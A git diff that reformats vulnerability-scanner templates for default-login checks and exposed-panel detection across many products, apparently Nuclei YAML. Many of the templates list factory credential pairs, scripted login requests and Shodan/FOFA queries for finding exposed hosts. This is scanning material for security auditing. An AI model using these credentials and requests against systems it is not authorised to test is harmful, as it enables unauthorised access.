+11,11 @@ info: - https://github.com/steve-community/steve/blob/e42ddcf1acf6c4ad2287bb466b2d3550663ce978/src/main/resources/config/test/main.properties classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"SteVe - Steckdosenverwaltung" google-query: intitle:"SteVe - Steckdosenverwaltung" tags: panel,default-login,steve @@ -25,7 +25,6 @@ http: - | GET /steve/manager/signin HTTP/1.1 Host: {{Hostname}} - - | POST /steve/manager/signin HTTP/1.1 Host: {{Hostname}} @@ -39,11 +38,11 @@ http: - admin password: - 1234 - req-condition: true redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/supermicro/supermicro-default-login.yaml b/http/default-logins/supermicro/supermicro-default-login.yaml index 43fdae920c..546de6431e 100644 --- a/http/default-logins/supermicro/supermicro-default-login.yaml +++ b/http/default-logins/supermicro/supermicro-default-login.yaml @@ -7,9 +7,9 @@ info: description: Supermicro Ipmi default admin login credentials were successful. reference: - https://www.gearprimer.com/wiki/supermicro-ipmi-default-username-pasword/ - tags: supermicro,default-login metadata: max-request: 2 + tags: supermicro,default-login http: - raw: @@ -28,8 +28,8 @@ http: pass: - ADMIN - admin - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/szhe/szhe-default-login.yaml b/http/default-logins/szhe/szhe-default-login.yaml index 761a0a13db..9fdb587d34 100644 --- a/http/default-logins/szhe/szhe-default-login.yaml +++ b/http/default-logins/szhe/szhe-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: szhe,default-login metadata: max-request: 1 + tags: szhe,default-login http: - raw: @@ -33,7 +33,6 @@ http: matchers-condition: and matchers: - - type: word words: - 'You should be redirected automatically to target URL: /' diff --git a/http/default-logins/tiny-file-manager-default-login.yaml b/http/default-logins/tiny-file-manager-default-login.yaml index d1b3f08259..923aa7d7cb 100644 --- a/http/default-logins/tiny-file-manager-default-login.yaml +++ b/http/default-logins/tiny-file-manager-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: html:"Tiny File Manager" tags: default-login,tiny,filemanager @@ -23,14 +23,12 @@ http: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded fm_usr={{user}}&fm_pwd={{pass}}&token={{token}} - - | GET /?p= HTTP/1.1 Host: {{Hostname}} @@ -41,11 +39,11 @@ http: - admin pass: - admin@123 - skip-variables-check: true host-redirects: true max-redirects: 2 cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/tooljet/tooljet-default-login.yaml b/http/default-logins/tooljet/tooljet-default-login.yaml index 80d301ae17..052b428635 100644 --- a/http/default-logins/tooljet/tooljet-default-login.yaml +++ b/http/default-logins/tooljet/tooljet-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"tooljet" tags: default-login,tooljet diff --git a/http/default-logins/trassir/trassir-default-login.yaml b/http/default-logins/trassir/trassir-default-login.yaml index 2d11b79613..a038f9f8bf 100644 --- a/http/default-logins/trassir/trassir-default-login.yaml +++ b/http/default-logins/trassir/trassir-default-login.yaml @@ -13,8 +13,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Trassir Webview" tags: default-login,trassir,webview @@ -32,8 +32,8 @@ http: - Admin password: - 12345 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/versa/versa-default-login.yaml b/http/default-logins/versa/versa-default-login.yaml index 4ca8f462b6..8c5942f8d8 100644 --- a/http/default-logins/versa/versa-default-login.yaml +++ b/http/default-logins/versa/versa-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,versa,sdwan metadata: max-request: 2 + tags: default-login,versa,sdwan http: - raw: @@ -21,7 +21,6 @@ http: GET /versa/login.html HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate - - | POST /versa/login HTTP/1.1 Host: {{Hostname}} @@ -35,9 +34,9 @@ http: - Administrator pass: - versa123 - cookie-reuse: true req-condition: true + matchers-condition: and matchers: - type: dsl diff --git a/http/default-logins/versa/versa-flexvnf-default-login.yaml b/http/default-logins/versa/versa-flexvnf-default-login.yaml index 1546cfc1ca..d65d0fbefa 100644 --- a/http/default-logins/versa/versa-flexvnf-default-login.yaml +++ b/http/default-logins/versa/versa-flexvnf-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 4 verified: true + max-request: 4 shodan-query: title:"Flex VNF Web-UI" tags: default-login,versa,flexvnf @@ -22,7 +22,6 @@ http: - | GET /authenticate HTTP/1.1 Host: {{Hostname}} - - | POST /authenticate HTTP/1.1 Host: {{Hostname}} @@ -39,9 +38,9 @@ http: password: - versa123 - versa123 - cookie-reuse: true stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/vidyo/vidyo-default-login.yaml b/http/default-logins/vidyo/vidyo-default-login.yaml index 6c2ffbf655..fa0a0123e7 100644 --- a/http/default-logins/vidyo/vidyo-default-login.yaml +++ b/http/default-logins/vidyo/vidyo-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N cvss-score: 5.8 cwe-id: CWE-522 - tags: vidyo,default-login metadata: max-request: 2 + tags: vidyo,default-login http: - raw: @@ -21,7 +21,6 @@ http: GET /super/login.html?lang=en HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - - | POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml index 299fe8c792..adfa9ecc2d 100644 --- a/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/http/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,trilithic,viewpoint metadata: max-request: 1 + tags: default-login,trilithic,viewpoint http: - raw: diff --git a/http/default-logins/visionhub/visionhub-default-login.yaml b/http/default-logins/visionhub/visionhub-default-login.yaml index 8a96d524fd..b077c8d002 100644 --- a/http/default-logins/visionhub/visionhub-default-login.yaml +++ b/http/default-logins/visionhub/visionhub-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: visionhub,default-login metadata: max-request: 1 + tags: visionhub,default-login http: - raw: diff --git a/http/default-logins/wayos/ac-weak-login.yaml b/http/default-logins/wayos/ac-weak-login.yaml index 9a000d3464..96193f0865 100755 --- a/http/default-logins/wayos/ac-weak-login.yaml +++ b/http/default-logins/wayos/ac-weak-login.yaml @@ -5,14 +5,14 @@ info: author: SleepingBag945 severity: high description: | - AC Centralized Management System default login credentials were discovered. + AC Centralized Management System default login credentials were discovered. reference: - https://github.com/Ershu1/2021_Hvv/blob/main/Wayos%20AC%E9%9B%86%E4%B8%AD%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%E5%BC%B1%E5%8F%A3%E4%BB%A4.md - https://github.com/chaitin/xray/blob/master/pocs/secnet-ac-default-password.yml metadata: verified: "true" - fofa-query: 'title="安网科技-智能路由系统"' max-request: 1 + fofa-query: 'title="安网科技-智能路由系统"' tags: ways-ac,default-login http: @@ -33,8 +33,8 @@ http: - 123456 - 12345678 - password - stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -53,4 +53,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/default-logins/weblogic/weblogic-weak-login.yaml b/http/default-logins/weblogic/weblogic-weak-login.yaml index 076bbb962a..8eceae10ce 100644 --- a/http/default-logins/weblogic/weblogic-weak-login.yaml +++ b/http/default-logins/weblogic/weblogic-weak-login.yaml @@ -12,16 +12,15 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,weblogic,vulhub metadata: max-request: 16 + tags: default-login,weblogic,vulhub http: - raw: - | GET /console/ HTTP/1.1 Host: {{Hostname}} - - | POST /console/j_security_check HTTP/1.1 Host: {{Hostname}} @@ -40,7 +39,6 @@ http: - admin - admin - system - password: - weblogic - weblogic1 @@ -50,9 +48,9 @@ http: - 12345678 - security - password - stop-at-first-match: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/webmin-default-login.yaml b/http/default-logins/webmin-default-login.yaml index b018bd8cf8..dc5ea78b7c 100644 --- a/http/default-logins/webmin-default-login.yaml +++ b/http/default-logins/webmin-default-login.yaml @@ -12,8 +12,8 @@ info: classification: cwe-id: CWE-798 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: title:"Webmin" tags: webmin,default-login @@ -29,7 +29,6 @@ http: Accept-Encoding: gzip, deflate user={{username}}&pass={{password}} - - | GET /sysinfo.cgi HTTP/1.1 Host: {{Hostname}} @@ -43,9 +42,9 @@ http: - admin password: - admin - host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/wifisky/wifisky-default-login.yaml b/http/default-logins/wifisky/wifisky-default-login.yaml index 4aaa84117c..dd15c04bdf 100644 --- a/http/default-logins/wifisky/wifisky-default-login.yaml +++ b/http/default-logins/wifisky/wifisky-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"WIFISKY-7层流控路由器" fofa-query: app="WIFISKY-7层流控路由器" tags: default-login,wifisky @@ -39,7 +39,6 @@ http: matchers-condition: and matchers: - - type: word words: - "text/html" diff --git a/http/default-logins/wildfly/wildfly-default-login.yaml b/http/default-logins/wildfly/wildfly-default-login.yaml index 6750da84bb..abecc3d8cf 100644 --- a/http/default-logins/wildfly/wildfly-default-login.yaml +++ b/http/default-logins/wildfly/wildfly-default-login.yaml @@ -8,9 +8,9 @@ info: Wildfly default admin login credentials were successful. reference: - https://docs.wildfly.org/26.1/#administrator-guides - tags: wildfly,default-login metadata: max-request: 1 + tags: wildfly,default-login http: - raw: @@ -20,9 +20,9 @@ http: digest-username: admin digest-password: admin + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/default-logins/wso2/wso2-default-login.yaml b/http/default-logins/wso2/wso2-default-login.yaml index 3ed53371f9..949e6e184f 100644 --- a/http/default-logins/wso2/wso2-default-login.yaml +++ b/http/default-logins/wso2/wso2-default-login.yaml @@ -12,9 +12,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: default-login,wso2 metadata: max-request: 1 + tags: default-login,wso2 http: - raw: @@ -31,7 +31,6 @@ http: password: - admin attack: pitchfork - redirects: false matchers: - type: word diff --git a/http/default-logins/xerox/xerox7-default-login.yaml b/http/default-logins/xerox/xerox7-default-login.yaml index dcc44910aa..ba2777f523 100644 --- a/http/default-logins/xerox/xerox7-default-login.yaml +++ b/http/default-logins/xerox/xerox7-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: xerox,default-login metadata: max-request: 1 + tags: xerox,default-login http: - raw: diff --git a/http/default-logins/xnat/xnat-default-login.yaml b/http/default-logins/xnat/xnat-default-login.yaml index aaaefe0235..e09e682678 100644 --- a/http/default-logins/xnat/xnat-default-login.yaml +++ b/http/default-logins/xnat/xnat-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"XNAT" tags: default-login,xnat diff --git a/http/default-logins/xploitspy/xploitspy-default-login.yaml b/http/default-logins/xploitspy/xploitspy-default-login.yaml index 3842333426..fda6d8d9ce 100644 --- a/http/default-logins/xploitspy/xploitspy-default-login.yaml +++ b/http/default-logins/xploitspy/xploitspy-default-login.yaml @@ -31,7 +31,6 @@ http: - admin pass: - password - redirects: true max-redirects: 2 diff --git a/http/default-logins/xui-weak-login.yaml b/http/default-logins/xui-weak-login.yaml index aad0982f68..afef78a275 100644 --- a/http/default-logins/xui-weak-login.yaml +++ b/http/default-logins/xui-weak-login.yaml @@ -12,8 +12,8 @@ info: classification: cwe-id: CWE-798 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"X-UI Login" tags: x-ui,default-login @@ -21,10 +21,11 @@ http: - method: POST path: - "{{BaseURL}}/login" + headers: content-type: application/x-www-form-urlencoded - body: "username={{username}}&password={{password}}" + body: "username={{username}}&password={{password}}" attack: pitchfork payloads: username: diff --git a/http/default-logins/xxljob/xxljob-default-login.yaml b/http/default-logins/xxljob/xxljob-default-login.yaml index e0e3cb7a25..018acc957f 100644 --- a/http/default-logins/xxljob/xxljob-default-login.yaml +++ b/http/default-logins/xxljob/xxljob-default-login.yaml @@ -12,8 +12,8 @@ info: cvss-score: 8.3 cwe-id: CWE-522 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.favicon.hash:1691956220 tags: default-login,xxljob @@ -25,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 userName={{username}}&password={{password}} - - | POST /login HTTP/1.1 Host:{{Hostname}} @@ -39,8 +38,8 @@ http: - admin password: - 123456 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/yealink/yealink-default-login.yaml b/http/default-logins/yealink/yealink-default-login.yaml index 2ff256ee44..f12ea8513f 100644 --- a/http/default-logins/yealink/yealink-default-login.yaml +++ b/http/default-logins/yealink/yealink-default-login.yaml @@ -9,9 +9,9 @@ info: reference: - https://support.yealink.com metadata: - fofa-query: Yealink CTP18 - max-request: 1 verified: true + max-request: 1 + fofa-query: Yealink CTP18 tags: default-login,yealink http: @@ -30,9 +30,9 @@ http: - admin password: - '0000' - host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index 746b70af57..9c352740da 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: zabbix,default-login metadata: max-request: 1 + tags: zabbix,default-login http: - raw: diff --git a/http/default-logins/zmanda/zmanda-default-login.yaml b/http/default-logins/zmanda/zmanda-default-login.yaml index d208e6c5c0..9349c5d694 100644 --- a/http/default-logins/zmanda/zmanda-default-login.yaml +++ b/http/default-logins/zmanda/zmanda-default-login.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 - tags: zmanda,default-login metadata: max-request: 1 + tags: zmanda,default-login http: - raw: diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 71bb7a015c..01594722f8 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -11,7 +11,7 @@ info: - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index 32ff5b58da..6d8988a930 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -11,7 +11,7 @@ info: - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/3g-wireless-gateway.yaml b/http/exposed-panels/3g-wireless-gateway.yaml index d5491a8ade..b851c6cd54 100644 --- a/http/exposed-panels/3g-wireless-gateway.yaml +++ b/http/exposed-panels/3g-wireless-gateway.yaml @@ -9,9 +9,9 @@ info: - https://www.exploit-db.com/ghdb/7050 classification: cwe-id: CWE-200 - tags: panel,router,edb metadata: max-request: 1 + tags: panel,router,edb http: - method: GET diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index 01deccb2ef..3174479b5c 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: max-request: 1 - fofa-query: body="Login @ Reporter" shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" tags: panel,login,acenet,acereporter http: diff --git a/http/exposed-panels/achecker-panel.yaml b/http/exposed-panels/achecker-panel.yaml index 9ad92a7781..91c7131c9e 100644 --- a/http/exposed-panels/achecker-panel.yaml +++ b/http/exposed-panels/achecker-panel.yaml @@ -9,11 +9,11 @@ info: - https://achecker.achecks.ca/checker/index.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,achecker metadata: max-request: 1 + tags: panel,achecker http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index 58325ee867..c081d964d8 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -11,8 +11,8 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - fofa-query: title=="Acrolinx Dashboard" shodan-query: http.title:"Acrolinx Dashboard" + fofa-query: title=="Acrolinx Dashboard" google-query: inurl:"Acrolinx Dashboard" tags: acrolinx,panel diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index 0bd6f657b1..67d8ca67d6 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true - fofa-query: app="ACTi-视频监控" + max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" + fofa-query: app="ACTi-视频监控" tags: acti,panel,login,detect http: diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index 95aea319f0..a1430a748c 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -9,14 +9,15 @@ info: - https://activeadmin.info/ classification: cwe-id: CWE-200 - tags: panel,activeadmin metadata: max-request: 1 + tags: panel,activeadmin http: - method: GET path: - '{{BaseURL}}/admin/login' + matchers: - type: word words: diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index c32dee827e..4b9b788356 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -9,9 +9,9 @@ info: - https://activemq.apache.org/ classification: cwe-id: CWE-200 - tags: panel,activemq,apache metadata: max-request: 1 + tags: panel,activemq,apache http: - method: GET diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 1ae3c42c34..a4bc5b7043 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -7,11 +7,11 @@ info: description: Acunetix login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Acunetix" tags: panel,acunetix diff --git a/http/exposed-panels/acunetix-panel.yaml b/http/exposed-panels/acunetix-panel.yaml index cadfb9b577..b32ffe6a22 100644 --- a/http/exposed-panels/acunetix-panel.yaml +++ b/http/exposed-panels/acunetix-panel.yaml @@ -9,9 +9,9 @@ info: - https://www.acunetix.com/ classification: cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET @@ -25,6 +25,7 @@ http: - 'Acunetix' - '' part: body + - type: status status: - 200 diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index 8ed52d1489..4899a58317 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -6,8 +6,8 @@ info: severity: info description: AddOnFinance Portal Panel was detected. metadata: - max-request: 1 verified: "true" + max-request: 1 shodan-query: title:"AddOnFinancePortal" tags: panel,addon,finance,detect diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 2d6fa34562..058cb69040 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -5,15 +5,15 @@ info: author: geeknik severity: high description: Adiscon LogAnalyzer was discovered. Adiscon LogAnalyzer is a web interface to syslog and other network event data. It provides easy browsing and analysis of real-time network events and reporting services. + reference: + - https://loganalyzer.adiscon.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 - reference: - - https://loganalyzer.adiscon.com/ - tags: adiscon,loganalyzer,syslog,exposure,panel metadata: max-request: 1 + tags: adiscon,loganalyzer,syslog,exposure,panel http: - method: GET diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index db52d29c3c..b2cbc6db69 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -9,19 +9,17 @@ info: - https://blog.sorcery.ie/posts/adminer/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: fuzz,adminer,login - # <= 4.2.4 can have unauthenticated RCE via SQLite driver # <= 4.6.2 can have LFI via MySQL LOAD DATA LOCAL # Most versions have some kind of SSRF usability # Is generally handy if you find SQL creds metadata: max-request: 741 + tags: fuzz,adminer,login http: - - raw: - | GET {{path}} HTTP/1.1 @@ -34,9 +32,9 @@ http: threads: 50 stop-at-first-match: true + matchers-condition: and matchers: - - type: word condition: and words: diff --git a/http/exposed-panels/adminer-panel.yaml b/http/exposed-panels/adminer-panel.yaml index e8e2bb1eb9..9e0552b2bd 100644 --- a/http/exposed-panels/adminer-panel.yaml +++ b/http/exposed-panels/adminer-panel.yaml @@ -10,8 +10,8 @@ info: classification: cwe-id: CWE-200 metadata: - max-request: 8 verified: true + max-request: 8 shodan-query: title:"Login - Adminer" tags: panel,adminer @@ -29,8 +29,8 @@ http: headers: Accept-Language: en-US,en;q=0.5 - stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/adminset-panel.yaml b/http/exposed-panels/adminset-panel.yaml index c91df53c7c..8f0707f201 100644 --- a/http/exposed-panels/adminset-panel.yaml +++ b/http/exposed-panels/adminset-panel.yaml @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/adobe/adobe-component-login.yaml b/http/exposed-panels/adobe/adobe-component-login.yaml index fdba10cd14..5bb5b0c0b0 100644 --- a/http/exposed-panels/adobe/adobe-component-login.yaml +++ b/http/exposed-panels/adobe/adobe-component-login.yaml @@ -25,6 +25,7 @@ http: - type: word words: - 'Component Browser Login' + - type: status status: - 200 diff --git a/http/exposed-panels/adobe/adobe-connect-central-login.yaml b/http/exposed-panels/adobe/adobe-connect-central-login.yaml index 0863646f68..fd36e57928 100644 --- a/http/exposed-panels/adobe/adobe-connect-central-login.yaml +++ b/http/exposed-panels/adobe/adobe-connect-central-login.yaml @@ -9,9 +9,9 @@ info: - https://www.adobe.com/products/adobeconnect.html classification: cwe-id: CWE-200 - tags: adobe,panel,connect-central metadata: max-request: 1 + tags: adobe,panel,connect-central http: - method: GET diff --git a/http/exposed-panels/adobe/aem-crx-package-manager.yaml b/http/exposed-panels/adobe/aem-crx-package-manager.yaml index a98426d4a2..fbb07878f5 100644 --- a/http/exposed-panels/adobe/aem-crx-package-manager.yaml +++ b/http/exposed-panels/adobe/aem-crx-package-manager.yaml @@ -9,7 +9,7 @@ info: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/adobe/aem-sling-login.yaml b/http/exposed-panels/adobe/aem-sling-login.yaml index 9de6b3c1b0..56e312bb53 100644 --- a/http/exposed-panels/adobe/aem-sling-login.yaml +++ b/http/exposed-panels/adobe/aem-sling-login.yaml @@ -9,7 +9,7 @@ info: - https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/aem2.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/advance-setup.yaml b/http/exposed-panels/advance-setup.yaml index 1704b03caa..706ad4fa0f 100644 --- a/http/exposed-panels/advance-setup.yaml +++ b/http/exposed-panels/advance-setup.yaml @@ -10,9 +10,9 @@ info: - https://www.actiontec.com/dsl/ classification: cwe-id: CWE-200 - tags: panel,setup,edb metadata: max-request: 1 + tags: panel,setup,edb http: - method: GET @@ -24,6 +24,7 @@ http: - type: word words: - 'Advanced Setup - Security - Admin User Name & Password' + - type: status status: - 200 diff --git a/http/exposed-panels/aircube-dashboard-panel.yaml b/http/exposed-panels/aircube-dashboard-panel.yaml index 6ea011fd66..7e909c7a81 100644 --- a/http/exposed-panels/aircube-dashboard-panel.yaml +++ b/http/exposed-panels/aircube-dashboard-panel.yaml @@ -7,11 +7,11 @@ info: description: airCube Dashboard login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"AirCube Dashboard" tags: panel,aircube diff --git a/http/exposed-panels/aircube-login.yaml b/http/exposed-panels/aircube-login.yaml index e3770e076e..32cf81c4c0 100644 --- a/http/exposed-panels/aircube-login.yaml +++ b/http/exposed-panels/aircube-login.yaml @@ -7,11 +7,11 @@ info: description: airCube login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:1249285083 tags: panel,aircube,ubiquiti diff --git a/http/exposed-panels/airflow-panel.yaml b/http/exposed-panels/airflow-panel.yaml index 9ef304f877..78ab9e62a7 100644 --- a/http/exposed-panels/airflow-panel.yaml +++ b/http/exposed-panels/airflow-panel.yaml @@ -9,7 +9,7 @@ info: - https://airflow.apache.org/docs/apache-airflow/stable/security/webserver.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 metadata: max-request: 2 @@ -23,6 +23,7 @@ http: - "{{BaseURL}}/admin/airflow/login" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/airnotifier-panel.yaml b/http/exposed-panels/airnotifier-panel.yaml index b01d026cb1..3fd336613b 100644 --- a/http/exposed-panels/airnotifier-panel.yaml +++ b/http/exposed-panels/airnotifier-panel.yaml @@ -7,11 +7,11 @@ info: description: AirNotifier login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + 